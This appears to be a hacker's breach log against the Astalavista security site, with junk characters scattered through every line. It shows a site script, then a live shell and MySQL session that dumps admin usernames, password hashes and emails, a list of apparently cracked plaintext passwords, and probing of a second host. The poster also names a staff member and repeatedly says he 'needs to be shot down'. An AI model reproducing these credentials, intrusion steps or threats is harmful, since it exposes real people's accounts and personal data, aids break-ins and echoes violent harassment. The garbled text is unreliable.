$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>4 @! _2 O( {% s" | i# @2 d p! ]1 @6 j3 `
<rss version=”2.0″>* b$ V9 L+ e6 f/ X- a0 x
<channel>8 C5 s" H0 q0 f$ s. s" W
<title>ASTALAVISTA.com - Exploits</title>& t' @. X4 s; H# D% {3 n1 c, D
<link>http://www.astalavista.com/exploits</link>+ q) ~5 K6 D- M; n
<description>All availably Exploits.</description>
- Q! p( v& T* a, z* A <language>en-us</language>
3 @! o' D# p1 O <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>! s* x, t a3 |8 U$ Q
<docs>http://blogs.law.harvard.edu/tech/rss</docs>: t5 f! K) Q/ ^6 p# A% W
<generator>Astalavista.com</generator>
! o, ~& {' s8 c7 v0 M0 l <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
g/ C, h9 b* O4 Y- S I </channel>3 B! k3 n$ A- F% q* G. A0 Z
</rss>’;
' U/ m3 V, _( s8 ?9 r# t/ s
# i: @" Y& j `0 K" l* C' y if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {; @/ v v* [5 o! E# E L
unlink (FULLPATH . ‘/feed/exploits.xml’);5 }) B; E( P* W$ n( M5 k
}
8 l9 d8 j7 o% c( o0 I8 k3 I. ^% m q; S# ~
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
0 B8 w( Q9 b0 d& M: n8 w( f; j[snip]$ Y5 }( a2 N- `& O+ C
% p! I9 ?* H' \" r
sh-3.2$ cat exploits.sh
+ J6 Z2 v: p! j1 Y: y0 H; a" m#!/bin/sh
5 n) a; A- f& O. J9 b" I6 P" c( ~8 e$ k/ ?5 X7 v" r
###########################################################1 g$ p! E( z) v; w+ h
# #% j- R* [8 w% d8 C6 h
# Title: milw0rm exploits adder #, \- m; l$ n" M& B& Q
# Description: Add all milw0rm exploits to the #
! |0 c7 B( Q) S H$ P" E# Astalavista.com database ## r+ U1 h2 K/ {
# #
& }; o3 y$ E9 m+ X9 ^! U C. v# Company: Astalavista Group #$ j1 I. H, ?3 g3 ^' o5 l
# Author: Paulo M. Santos #, a9 X2 p; T3 e5 S) [4 |; O
# E-Mail: 链接标记paulo.santos@astalavista.ch #
4 P8 N/ C% v* x; L8 F4 S. N" d1 s; m# #
1 C$ k4 `. H0 S- Z' {, C###########################################################
/ C. m K2 R, ?% ?! q4 [
7 N! Y+ }1 c! w# path
/ G* s! l# c& e& Zthis_path=/home/com/public_html/modifications/cronjobs) V6 n( w7 \8 E7 x2 w V0 X. p
+ Y% k! F: r5 U8 ]# change directory6 L0 a: P7 _5 T# j
cd $this_path
/ N( a4 `& b+ R5 g3 hcd tmp/+ k. ?8 U2 d, s3 t, k& B! h3 @' |
) C7 A! P1 @2 l! z! o! f8 t# delete files
% m" W; R' }$ J: Z3 I: W: xrm -rf milw0rm.tar.* &0 [4 e& E- K# c3 v$ Q0 U) l0 r2 j
rm -rf milw0rm/ &+ e/ A9 V% k7 Z8 l, W
. o. j* Y- e& p" u
# wget milw0rm paket
* X O- d1 |6 z" Y7 Qwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
" v+ e4 ?! O" J7 G' e! k' i
}4 A) a/ y7 e/ e; q4 ]/ O# extract milw0rm paket
; n" i! C. m# n1 D W, Btar -xvf milw0rm.tar.bz2% \* @$ q+ g% v# y; L- V
! s, r# i, `. S. n* J3 d/ ^4 H+ E# change owner
, c8 A1 o d" C% m1 u: p9 f. Lchown -R com .
: P* R x1 ]5 Rchgrp -R com .
4 s0 i/ T, s: E" P. ?# R |1 H, O/ a2 j4 r5 V4 w. W% ?
# execute php script+ p6 U( A8 M8 r, v5 A2 m% W) n1 k
cd $this_path. k2 w8 g! Q5 S" G" O8 O: p
php -q exploits.php
: M. K. f. n% j( s, {% |5 |: _/ q- x1 i0 ~5 e
# delete files2 ^% `4 X" }( R/ U3 E7 _+ b
rm -rf tmp/milw0rm.tar.*) o$ d! v8 ~3 T6 j/ X* U+ N
rm -rf tmp/milw0rm/% ~1 h3 Z( Z0 L* S0 }$ {
/ [, }4 ~, I& y
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
/ O" \7 T R0 kPaulo M. Santos needs to be shot down.4 O2 X4 P, S2 F' {9 r, L- m+ f
# H* X) h3 ~" h) ~: `) ]mysql -u contrexxuser2 -p
0 M9 z- E$ J; S, R- ^6 C+ nEnter password:
% }; w/ x) w. yWelcome to the MySQL monitor. Commands end with ; or \g.
4 y7 \! n1 B ?: L g" U$ GYour MySQL connection id is 261694: x v6 w2 k$ r7 H; R i3 O2 j
Server version: 5.0.45-community-log MySQL Community Edition (GPL); k4 D3 z4 t5 X/ K3 c4 a" V" b, a
; a) i I6 r7 ~: k1 e" v$ c- Z& hType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 {; N4 k" H0 P5 l9 ~
' {1 C `! ]5 x! }1 B' q( Qmysql> show databases;
: F$ D# ~0 O+ Q3 ]- S+——————–+5 o6 ~" o2 \# @5 u/ x% @: i" k: b
| Database |! u+ S5 L/ [5 \9 V5 H% V
+——————–+9 J5 ?9 h6 f9 A/ L5 o# d3 m
| information_schema |
0 j% P' n/ {) P) X2 [8 h$ z% W| com_contrexx2 |. d" j* l* |0 ?* S: ]1 X: Q# \, P$ c
| com_contrexx2_live |/ Q* s$ X5 K1 p. n8 ^2 ]# P
| test |
+ M- l. i( h0 n* y% Z, p+——————–+
3 `, `, l$ l% M+ c8 M. v" G4 rows in set (0.00 sec)
, H" e H0 M# h" }2 P" N/ a9 X2 v0 M
& J6 r1 e; M/ h) z' P* mmysql> use com_contrexx2_live
5 M8 e9 f% n' c- TDatabase changed* L' W9 t2 \4 Y8 a
mysql> show tables;
" i+ z, B% l6 l2 W+————————————————–+
~0 t! ^: G3 \2 l n* e7 ~7 Y| Tables_in_com_contrexx2_live |
; L; U. l/ T( _) K9 c u+————————————————–+& V% w3 H G6 U1 ~, v
| cc_banner_counter |
1 C* X$ t' s( d| cc_search_counter |& N/ b; o& e. Z J
| contrexx_access_group_dynamic_ids |
5 @$ ]- h7 ^1 A& ` D! Q. ^% k| contrexx_access_group_static_ids |0 P; i0 i$ K- O& ]5 _
| contrexx_access_rel_user_group |
( r, e# x) d# w2 g+ v| contrexx_access_settings |
" o; N+ _' J( i. V| contrexx_access_user_attribute |
+ Z1 o" k. z1 H" W& m- |/ Q" v4 j# Y| contrexx_access_user_attribute_name |$ `1 E" f/ S' I2 J( n* Q, W$ P
| contrexx_access_user_attribute_value |, z o& o/ A7 t' X# Q
| contrexx_access_user_core_attribute |4 o$ d# r F; K- z4 E6 c4 c
| contrexx_access_user_groups |
( c$ l0 H7 ~ S- U1 b% t+ f/ q+ P- Z E| contrexx_access_user_mail |/ ^% s$ H- |* N. C9 | _$ ?% b: M0 x
| contrexx_access_user_profile |6 A, M( }$ m, h7 Z" W: [
| contrexx_access_user_title |& a% e# {* s, ?
| contrexx_access_user_validity |: }: Y y P2 |4 Y i
| contrexx_access_users |2 R* m- |, [; ]/ P3 t
| contrexx_backend_areas |) K* F8 i1 S* w, e
| contrexx_backups |
% Y0 q9 m/ |- R5 y# K8 c| contrexx_content |
4 S' ^- `, g7 ^8 r| contrexx_content_history |" z- w% @$ u) Q. a) U0 \6 ?
| contrexx_content_logfile |; u ]: }" o; d1 X' q1 Q
| contrexx_content_navigation |* A7 S/ Q7 w# F
| contrexx_content_navigation_history |2 k2 c. A4 K# r0 z N/ _
| contrexx_ids |
8 t6 p% H1 F7 K2 m| contrexx_languages |' \- C( A8 t, k( F
| contrexx_lib_country |$ A8 g, L6 g9 v% o
| contrexx_log |; j4 b! j, C7 w- C9 t2 N8 i6 Q
| contrexx_module_alias_source |
u" U; V6 D4 l% W- B| contrexx_module_alias_target |
4 d. J7 u3 O! s( E7 o| contrexx_module_block_blocks |
5 S3 D1 k& z; z8 j' f7 Z' [| contrexx_module_block_rel_lang |( a8 I/ q: }9 e5 ^8 A- |) I
| contrexx_module_block_rel_pages |
5 G9 V M$ F! `$ `6 k| contrexx_module_block_settings |
" k6 ~7 h" @, I || contrexx_module_blog_categories |
6 {; b3 M; i$ }& ^7 X4 L| contrexx_module_blog_comments |
/ k. ~% a/ R7 G' i1 x/ o3 h| contrexx_module_blog_message_to_category |4 l/ ^/ I; }7 s8 ]4 }1 C# d
| contrexx_module_blog_messages |% P6 Y: ?; r) e, a* A
| contrexx_module_blog_messages_lang |
" E; u& B: x0 H: @; I| contrexx_module_blog_networks |
2 z; J. v) Z8 o" W| contrexx_module_blog_networks_lang |
# o- [2 Y# I' D| contrexx_module_blog_settings |
- \2 N6 z! u1 N! z/ [| contrexx_module_blog_votes |
4 P/ h, b8 p3 `4 ] O1 D7 e2 k| contrexx_module_calendar |6 |3 c' n8 _0 f
| contrexx_module_calendar_access |$ C) Y! W2 q, M+ P" p- t4 [' L
| contrexx_module_calendar_categories |2 N5 M& u/ a% |( e4 z- A; \0 E
| contrexx_module_calendar_form_data |. _: `" Q6 j8 U
| contrexx_module_calendar_form_fields |) ]. l7 q' B# d# l0 S7 h
| contrexx_module_calendar_registrations |, A: x6 M/ R$ G+ ]4 H7 t# d
| contrexx_module_calendar_settings |
# Z4 }% p {' ]$ S7 ^, b| contrexx_module_calendar_style |
' v3 w$ \+ u8 o6 _- L# U| contrexx_module_contact_form |2 a1 Z" a% |: h) ~
| contrexx_module_contact_form_data |& I1 u: S) k; }( J S6 N$ o- J
| contrexx_module_contact_form_field |
" D+ J' m6 K' L+ V| contrexx_module_contact_settings |
2 T+ [# N. z P3 N| contrexx_module_data_categories |) @( G! q# ^! e: i: g) w
| contrexx_module_data_message_to_category |
; u1 Q& V$ B$ M. ~' I+ a| contrexx_module_data_messages |
! w# H u1 m( r" H, m2 _. o| contrexx_module_data_messages_lang |" ^) `5 D: k4 t0 s
| contrexx_module_data_placeholders |' c) |( y0 m# U$ v# x
| contrexx_module_data_settings |
+ w4 A3 `. z2 a| contrexx_module_directory_access |: N5 L- \3 R4 U% I t
| contrexx_module_directory_categories |
% B. S$ f8 B/ K: D. T| contrexx_module_directory_dir |" c4 r/ g: r9 [, F$ [" k& l
| contrexx_module_directory_inputfields |! n8 s$ s1 M1 j) Y' y1 m
| contrexx_module_directory_levels |
( \) F: W/ {8 f$ N6 c3 D8 X+ K| contrexx_module_directory_mail |2 F3 S% r$ G5 a3 p2 R9 o; H
| contrexx_module_directory_rel_dir_cat |( N4 l7 ^6 Z: a
| contrexx_module_directory_rel_dir_level |7 c g2 e& b) y4 [
| contrexx_module_directory_settings |
+ Q0 }2 T7 r1 B& p) e| contrexx_module_directory_settings_google |
3 Q5 T% H1 k" t| contrexx_module_directory_vote |
: w$ V+ {. X% \" {| contrexx_module_docsys |
5 g' Q% D6 z8 \" Y6 k2 `| contrexx_module_docsys_categories |
2 ?4 q& o1 F+ w5 M| contrexx_module_egov_configuration |+ [( c8 g* R2 i
| contrexx_module_egov_orders |; M4 t3 p% H2 n" u
| contrexx_module_egov_product_calendar |. h8 ?2 {9 J; `" p& M
| contrexx_module_egov_product_fields |$ y A H$ E/ o& N/ a4 E
| contrexx_module_egov_products |
; U7 }# J) l$ y- N| contrexx_module_egov_settings |
& ~% d- ?3 z* e+ F& Y| contrexx_module_exploits |3 C' t6 I3 m# f' O6 q6 ~* x
| contrexx_module_exploits_categories |5 ]) F: c1 X7 m
| contrexx_module_feed_category |
: z! i) ]" ~% E' U| contrexx_module_feed_news |
9 H/ P% O7 c5 e$ w6 j| contrexx_module_feed_newsml_association |/ G+ F% U7 \" q0 O. ~; _8 p
| contrexx_module_feed_newsml_categories |
' M8 Y0 i6 f* \' S$ K8 m| contrexx_module_feed_newsml_documents |4 o7 n! B" H( @
| contrexx_module_feed_newsml_providers |
6 \# F3 s& r- t4 b+ I% W| contrexx_module_forum_access |
" Q! a* Z. T- m| contrexx_module_forum_categories |- s* m4 l8 H2 X" Z) ^
| contrexx_module_forum_categories_lang |0 g0 q5 D) P5 k) x) A T1 d
| contrexx_module_forum_notification |, \0 ]8 b; s! V# k1 ~/ P2 j4 {) H
| contrexx_module_forum_postings |# E! z9 i- j) m% O/ t
| contrexx_module_forum_rating |
! {1 ~) D& @- q: e- f D' V| contrexx_module_forum_settings |
; X: X) \" @- K" k$ f5 u6 {5 `| contrexx_module_forum_statistics |0 T7 y2 E% i4 m0 W! E- E+ H
| contrexx_module_gallery_categories |
4 h5 A0 S4 D- w7 a! J/ S| contrexx_module_gallery_comments |" ~2 ]8 _9 S2 {9 E( R
| contrexx_module_gallery_language |$ H3 \ P6 e/ r+ e6 |* [" q9 ~" n6 S
| contrexx_module_gallery_language_pics |
5 m" Q6 Q5 M. z+ _: v| contrexx_module_gallery_pictures |
" J6 c/ N5 {4 N/ g, r| contrexx_module_gallery_settings |
+ o: N/ d7 i$ f+ [% P( z| contrexx_module_gallery_votes |
$ N( Y# {" G* A8 C: F| contrexx_module_guestbook |
5 a, Y6 k2 z# ~# o) i| contrexx_module_guestbook_settings |
- T. B5 c" w/ ^5 y% d| contrexx_module_livecam |# M i, y3 `) `+ z7 j2 R2 O3 l( `- a+ M) d
| contrexx_module_livecam_settings |! R# ]. {6 B* p0 \, q
| contrexx_module_market | T# d) M& r( j: I
| contrexx_module_market_access |
5 m& O! d8 M4 [6 W/ S+ h| contrexx_module_market_categories |
! w- P1 ]5 R7 ~1 R5 `% C1 e. P| contrexx_module_market_mail |
$ t6 |& x& @8 I7 ^9 P- p. p6 d9 m| contrexx_module_market_paypal |
) v7 x5 f2 P+ S S2 T| contrexx_module_market_settings |' ~& R5 \& U0 Y% t- w2 q
| contrexx_module_market_spez_fields |
! v" z5 I1 U' @6 l. Z| contrexx_module_mediadir_access |
8 N$ d4 h4 E/ y0 ?- D& J% e| contrexx_module_mediadir_categories |
: c) {; ~3 d# u$ Q$ b' r1 ]- h| contrexx_module_mediadir_comments |
) n0 ^+ G9 f5 h( d! X| contrexx_module_mediadir_dir |* G s0 ] |( \4 O
| contrexx_module_mediadir_inputfields |
( o' f: Q! k' j- Z a6 U* ?) a| contrexx_module_mediadir_levels |/ }* g/ }; [: n/ [1 @: Y/ p
| contrexx_module_mediadir_mail |
9 p! f, K$ u4 T: R5 \; K| contrexx_module_mediadir_rel_dir_cat |
* p4 q9 n8 z6 L| contrexx_module_mediadir_rel_dir_level |
8 H9 I' A$ t' F) X| contrexx_module_mediadir_reports |; f$ B2 y+ l5 a$ ~% h
| contrexx_module_mediadir_settings |
# w. W" h6 i/ C2 ^1 R| contrexx_module_mediadir_settings_google |2 n% Q, w! p4 I7 ~; N; S. n
| contrexx_module_mediadir_vote |
G' O" g3 J7 |! Q* x1 R: x7 E| contrexx_module_memberdir_directories |
9 F! D3 M; Y3 ?$ _0 J| contrexx_module_memberdir_name |: S4 z1 ?) V6 u+ Y2 T
| contrexx_module_memberdir_settings |
+ J. o7 x2 V) b! _- s1 m| contrexx_module_memberdir_values |
" l, q9 o: J2 d| contrexx_module_nettools_allowed_groups |
2 a( \! f8 l! X% D| contrexx_module_nettools_settings |
: [% L( _, Y1 g2 Y! ?| contrexx_module_news |7 p# S3 d2 W* R6 o: e7 t6 ~
| contrexx_module_news_access |& G- f) J. Y" L' x( \! s, Y
| contrexx_module_news_categories |
' a. L: e6 Z. k. p5 c| contrexx_module_news_settings | q+ c" U% [" n1 S3 r, t
| contrexx_module_news_teaser_frame |
! }: F. a! f( h! o) G| contrexx_module_news_teaser_frame_templates |
7 Z5 Q$ ?6 O6 V8 C| contrexx_module_news_ticker |
- g( Y2 W3 M& Z5 P: A: D) e% z* T( p| contrexx_module_newsletter |" C6 a2 @$ j6 w4 {
| contrexx_module_newsletter_attachment |
, ]- Z( K9 P Y( i$ G| contrexx_module_newsletter_category |
2 c1 M" h/ n% M4 z/ }6 K| contrexx_module_newsletter_confirm_mail |
. H$ h8 X8 e( I1 o5 W6 m| contrexx_module_newsletter_rel_cat_news |
{/ j5 ~! R J1 N6 w% m| contrexx_module_newsletter_rel_user_cat |
- Q- t/ d- K: W| contrexx_module_newsletter_settings |
8 K+ W O. K& D0 N+ m| contrexx_module_newsletter_template |
+ `8 `, [, V! w3 C| contrexx_module_newsletter_tmp_sending |5 z% d- M; }9 n& r+ v$ y7 i
| contrexx_module_newsletter_user |
9 g& ~. o, i$ t" || contrexx_module_newsletter_user_title |/ G/ w7 _3 g$ M( w' B
| contrexx_module_onlinetools_defaultports |' ]- }" l) ?1 K7 d* X8 x' n
| contrexx_module_onlinetools_defaultports_back |4 f; ~! g, \6 i8 q7 z+ ?, n" E
| contrexx_module_onlinetools_geolitecity_blocks |" J, p$ [) ` v2 y
| contrexx_module_onlinetools_geolitecity_country |( \8 J% n) b& o4 e: `' ?- Y
| contrexx_module_onlinetools_geolitecity_location |
0 v' b/ g2 O( w& C3 t: N| contrexx_module_podcast_category |
; N3 N, B+ \/ G7 T; d$ h8 m| contrexx_module_podcast_medium |3 I# _- o7 t' m7 A
| contrexx_module_podcast_rel_category_lang |
a: r9 J0 V/ A; Y1 E# X| contrexx_module_podcast_rel_medium_category |6 {# ]: `! s7 A1 ~% s
| contrexx_module_podcast_settings |
' r* {. `& N1 @, e6 P| contrexx_module_podcast_template |
: D0 ]/ D( Z! o9 n Y| contrexx_module_proxydb |5 B$ a2 v: O$ F2 n
| contrexx_module_recommend |7 P+ K' m6 ~9 |7 q3 h! u1 S
| contrexx_module_repository |* x( z) P! u) i3 i, l
| contrexx_module_securitynews_cats |' `: s5 H, m1 e3 v* y
| contrexx_module_securitynews_feeds |
8 q! L. k5 _2 g$ l| contrexx_module_securitynews_news |
; l) D, \" y0 j' n3 g| contrexx_module_shop_categories |. j2 R z# }$ \; b, w& z
| contrexx_module_shop_config |
$ Y2 ~( I9 X- N3 |9 L| contrexx_module_shop_countries |9 `- [5 I: k4 d' f
| contrexx_module_shop_currencies |
$ f2 _3 w' v! Y7 x( C9 g- p| contrexx_module_shop_customers |
3 s5 v8 \! E' Z" v) f2 S; P6 }| contrexx_module_shop_importimg |
0 I) H( X3 A, ^1 `0 L2 Z" J9 T7 d| contrexx_module_shop_lsv |$ @! Q; K* L6 ^! n0 b7 w# Z
| contrexx_module_shop_mail |, _/ @0 Q4 k- j; o0 r: c
| contrexx_module_shop_mail_content |* u, @8 n& w& E: L% J9 h6 r
| contrexx_module_shop_manufacturer |2 O+ q/ [0 i8 b, i) K! b! P5 P5 @
| contrexx_module_shop_order_items |! M3 Q2 B- n" y7 ?0 f) s
| contrexx_module_shop_order_items_attributes |
# }) Y9 v. J/ k% ?, [| contrexx_module_shop_orders |
6 Q7 _6 {) @! V! p* f| contrexx_module_shop_payment |
& u5 |6 U/ G% F0 O9 b- }& e O| contrexx_module_shop_payment_processors |
* y" t4 i, c" S* E$ i6 a| contrexx_module_shop_pricelists |
, }$ H: w8 V; F$ U, |" F| contrexx_module_shop_products |, ~7 \3 Q% X) \% |& ?
| contrexx_module_shop_products_attributes |4 |0 X- |% I M; M* m$ A/ M
| contrexx_module_shop_products_attributes_name |7 A9 X" q2 |& m6 W
| contrexx_module_shop_products_attributes_value |
+ ]6 c) R$ P7 ^, b9 X| contrexx_module_shop_products_downloads |# n& ]0 s ~9 x* o
| contrexx_module_shop_rel_countries |
1 h k$ i# }) [9 A# A" o| contrexx_module_shop_rel_payment |
2 V# {6 j0 O/ ^9 `* R| contrexx_module_shop_rel_shipment |
+ v" X% v4 Y5 h4 I$ W2 d2 J6 Z| contrexx_module_shop_shipment_cost |' a1 x V& {6 K' o6 u5 t
| contrexx_module_shop_shipper |" w) P6 B2 \3 P$ X* L
| contrexx_module_shop_vat |
, @+ A& N: q" R! Q| contrexx_module_shop_zones |
; p. d4 Q* S' }4 |) X| contrexx_module_u2u_address_list |8 A+ ?4 A L$ i8 d
| contrexx_module_u2u_message_log |% v2 g' r& w, z; l% E. |& \ ]& |: Y
| contrexx_module_u2u_sent_messages |: Q( F2 _( \' W7 o* D" K
| contrexx_module_u2u_settings |: w1 g) ?$ `4 I1 W0 s$ @& @6 Z
| contrexx_module_u2u_user_log |
; s7 V) Z0 r' f5 F1 \4 v6 P& _+ Q| contrexx_modules |
/ q7 c. l" m! ?# O| contrexx_sessions |
7 N! b0 t. @1 @| contrexx_settings |
* g# Q% q/ K$ O3 c" g2 y| contrexx_settings_smtp |
4 K+ k w! |. K| contrexx_skins |" f6 C5 Z0 g( F
| contrexx_stats_browser |/ F( v+ k8 ? g) y G {8 ?6 _
| contrexx_stats_colourdepth |$ ^- Y" K) o. _
| contrexx_stats_config |
* Y% E/ y/ D' x! h9 O% J0 g9 Q8 R| contrexx_stats_country |# q& v0 _2 I, s* [4 N- i
| contrexx_stats_hostname |
1 S+ s( v5 l3 {| contrexx_stats_javascript |
! A3 U# c+ N9 W* {# T+ Y) u| contrexx_stats_operatingsystem |) o* N9 k; b) U* |+ E% N1 f
| contrexx_stats_referer |
/ r1 J. l# Y; Q8 i/ E* g| contrexx_stats_requests |
8 s8 o8 r0 ?% P5 k1 M& M# [2 m3 S| contrexx_stats_requests_summary |5 K- R# n2 m0 o/ h v4 Z
| contrexx_stats_screenresolution |0 L% d/ h+ C- ~6 R8 X, X
| contrexx_stats_search |
& W2 g0 A% z: P| contrexx_stats_spiders |
0 Q1 O8 a7 Z7 d. `/ V| contrexx_stats_spiders_summary |; b/ v* t" N% j; ~9 h2 E
| contrexx_stats_visitors |
. u! N3 a0 |7 ]| contrexx_stats_visitors_summary |- M; o5 U6 `% m+ v7 ]* h- e; O
| contrexx_voting_additionaldata |
: S( u) v0 i, R1 D( Q3 L; J) V& i| contrexx_voting_email |
) r T; D9 I+ i o! Z; }( @6 U# [| contrexx_voting_rel_email_system |
/ k5 t' w! c7 i& k# f| contrexx_voting_results | O( R+ d0 q; F- N1 v7 m' H
| contrexx_voting_system |
P8 \6 m0 O7 e) d; || foo | |' \/ w. ?6 K
+————————————————–+( d5 b; ^- S, I1 G6 B7 _
227 rows in set (0.01 sec)
J" [/ K o2 Y3 {) U
/ Y+ C) k9 e( P: jmysql> select count(*) as skids from contrexx_access_users;
- B) E& F7 m/ j- E7 G+ _7 p+——-+
6 R2 t# p: }* ~/ }& z| skids |3 t9 f4 a5 q3 l0 y3 k. H% c9 ~: ^6 Z
+——-+
: [. e" P; k# {% M. p| 53699 |
! Z0 a6 r7 p1 B. e+——-+9 s) K5 h' b2 |/ Z# ~$ P0 B
1 row in set (0.00 sec)
( g( g6 C) T% w g$ `
# l) {' k2 ]2 w W! O) ^( O- hmysql> describe contrexx_access_users;
0 D: Z% ]) v8 O1 |5 s" l$ Y+——————+——————————————+——+—–+————–+—————-+* p3 m! ~) q( }* n# {# O
| Field | Type | Null | Key | Default | Extra |) ^# V% Y0 R) X% A
+——————+——————————————+——+—–+————–+—————-+# ^& g; w! U7 q" X/ p
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
- B. r5 l+ @3 E5 m: Y2 r* }; ?) v| is_admin | tinyint(1) unsigned | NO | | 0 | |
4 z; L N* j/ [4 W3 c# s5 f| username | varchar(40) | YES | MUL | NULL | |
# l6 L* |8 h7 \$ c4 f4 Q1 H. u| password | varchar(32) | YES | | NULL | |; h' C5 u) M( r4 q6 q9 l
| regdate | int(14) unsigned | NO | | 0 | |
+ X7 I9 Y% w2 ~1 f8 T. H3 A| expiration | int(14) unsigned | NO | | 0 | |' q. `5 o) p0 i' e/ s0 M: ?+ M+ D) l
| validity | int(10) unsigned | NO | | 0 | |
3 s. H* L! N# H0 f0 X| last_auth | int(14) unsigned | NO | | 0 | |6 b' m E+ ^# x6 A5 b
| last_activity | int(14) unsigned | NO | | 0 | |4 V4 i6 M! z5 J) D9 ?
| email | varchar(255) | YES | | NULL | |+ ~( I# S( g6 Y! U
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
( R2 U6 x6 k( ~- v3 I| frontend_lang_id | int(2) unsigned | NO | | 0 | | W7 h% O0 a0 z
| backend_lang_id | int(2) unsigned | NO | | 0 | |1 Q$ x6 H5 J# C! M$ b/ Y) R3 H
| active | tinyint(1) | NO | | 0 | |
* c$ P' L% D! T8 v5 p ^$ C0 m$ u| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
3 L8 |3 M& R, s5 {4 U5 x7 N| restore_key | varchar(32) | NO | | | |
: m+ b, k0 s; t4 \) `1 e- r* || restore_key_time | int(14) unsigned | NO | | 0 | |
2 q4 L" D4 ]9 F/ ]4 j* U| u2u_active | enum(’0′,’1′) | NO | | 1 | |3 Q4 ~8 S4 O* ^3 w1 c: w4 m8 ]
+——————+——————————————+——+—–+————–+—————-+: J8 Q- }* x% a8 r/ q$ p% l, S6 s
18 rows in set (0.00 sec)
$ a* L# E) t7 D$ r
3 D5 w4 i, u" z: N/ }' }9 _mysql> select username,password,email from contrexx_access_users where is_admin = 1; S# g: U- Q; G+ ]
+————+———————————-+—————————–+
/ N5 l" x/ v; o| username | password | email |
+ g" w6 z+ P% h) e% Q, C, \* |+————+———————————-+—————————–+
' m/ M4 }, m% f7 h- @; N| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
: O! g, M6 `0 Y2 _* n g% @$ E| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
6 Z5 }5 i/ k' D: f% T; E| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |, R- _' N5 A n8 C" H, V" l
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |9 R4 z& W3 C4 I. `
+————+———————————-+—————————–+
* E1 T7 L4 [! p) d; d4 rows in set (0.04 sec)# ^0 E4 c6 Q r( u) ^' U
! M8 S' C! z9 I' O4 Q% F
mysql> exit;% W, ~) Z8 R% ~ `% k# n7 \
Bye8 z$ B! ?3 B i7 ^& v* r5 P
( H) c5 L" ^/ T[~] There you go, your “team of security and IT professionals” is a joke.
( Y" ?$ e0 N6 F* g# ]' d7 I6 {& y! ~3 V7 x' v
+——————————+
9 @) Y0 W+ | T% Y6 Wsystem:f82BN3+_*$ ]7 t$ \) v% u# z5 e M/ C
Be1er0ph0r:belerophor4astacom" L8 e2 b9 M4 X6 [
prozac:asta4cms!) q. k5 J! U9 N5 F
commander:mpbdaagf6m0 M' G' c5 X \5 s3 d& M; S0 N% V
sykadul:ak29eral
! {& _! Q, \8 A+——————————+
$ ^6 p/ O. {( j& R
7 `! _/ a3 i! I[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s). `. h: ~# v2 z I3 u
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.+ \) X$ n7 m; O5 @5 ^. } L
& k1 i' c! }/ O, @9 ^8 {1 U[~] Lets move to astalavista.net now,; s! R* ^( g G* _) ?
, v+ X; g6 _ p! p
From <链接标记[url]https://www.astalavista.net/[/url]>:
/ |7 V9 h' P7 D, v; _# Q8 b>> Everyone knows that the best defense is a good offense.
' u, p \2 g% K' q>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
9 x, o- U |+ u/ n5 w0 J: I>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.: f+ P8 J* n; \ O# i* g8 i
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”1 S2 d5 V/ u0 r
2 ?. o" l. i$ V>> Go ahead, try and hack our server . in a completely legal way!" Y: r- s9 r- [/ Q! A# l
>> Learn by doing: We offer our members tricky tasks and challenges on an5 s$ O5 N8 i# ^, Q8 q% [* B
>> ongoing basis so you can test your knowledge and abilities. You can also0 Q1 N5 Y; z4 g- o6 V
>> demonstrate what you.ve mastered by taking part in regular hacker contests
9 n) X& b$ a3 ], U>> and war games9 ]0 i5 k( T7 D3 i. V0 i6 m
8 ?6 P. o7 q. @) X8 t+ s[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
& d# n9 O9 w) J) K* [
3 G! c# H& l" g9 R4 G[-] Tricky task: Find home dir of astalavista.net
0 B4 g3 k T* s( d7 t+ [
: N }) k3 `1 g, I. M. |sh-3.2$ ls -la ~astanet
3 x/ v# N v+ `% P' l* Xtotal 485 C& Q0 y+ t8 u
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
* Q5 S. I5 Q% xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) a' h% y. E( I- s8 r/ }) ~( Y
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
6 k! I! V @6 `, x7 w-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
) U- k0 d) G: Q& h! ^5 W-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout8 {) @7 K2 u0 X- E" l3 U
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile9 A9 x* f' b( o( }' H' S
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
9 ~; h1 x( g: [( P: m4 L3 Ddrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
% v, H h4 n# [. K% q" I2 ~9 X# O$ Tdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap* P) M; @$ F* ]5 b
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail" P2 @9 v( a# g# b, b# O
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
7 t5 t3 o" _6 z& s. g8 P3 D-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow8 `" E& v- i4 V
! e6 z5 v# p8 H1 F2 osh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
! T2 B3 d' T( Y; fsh-3.2$ ls -la
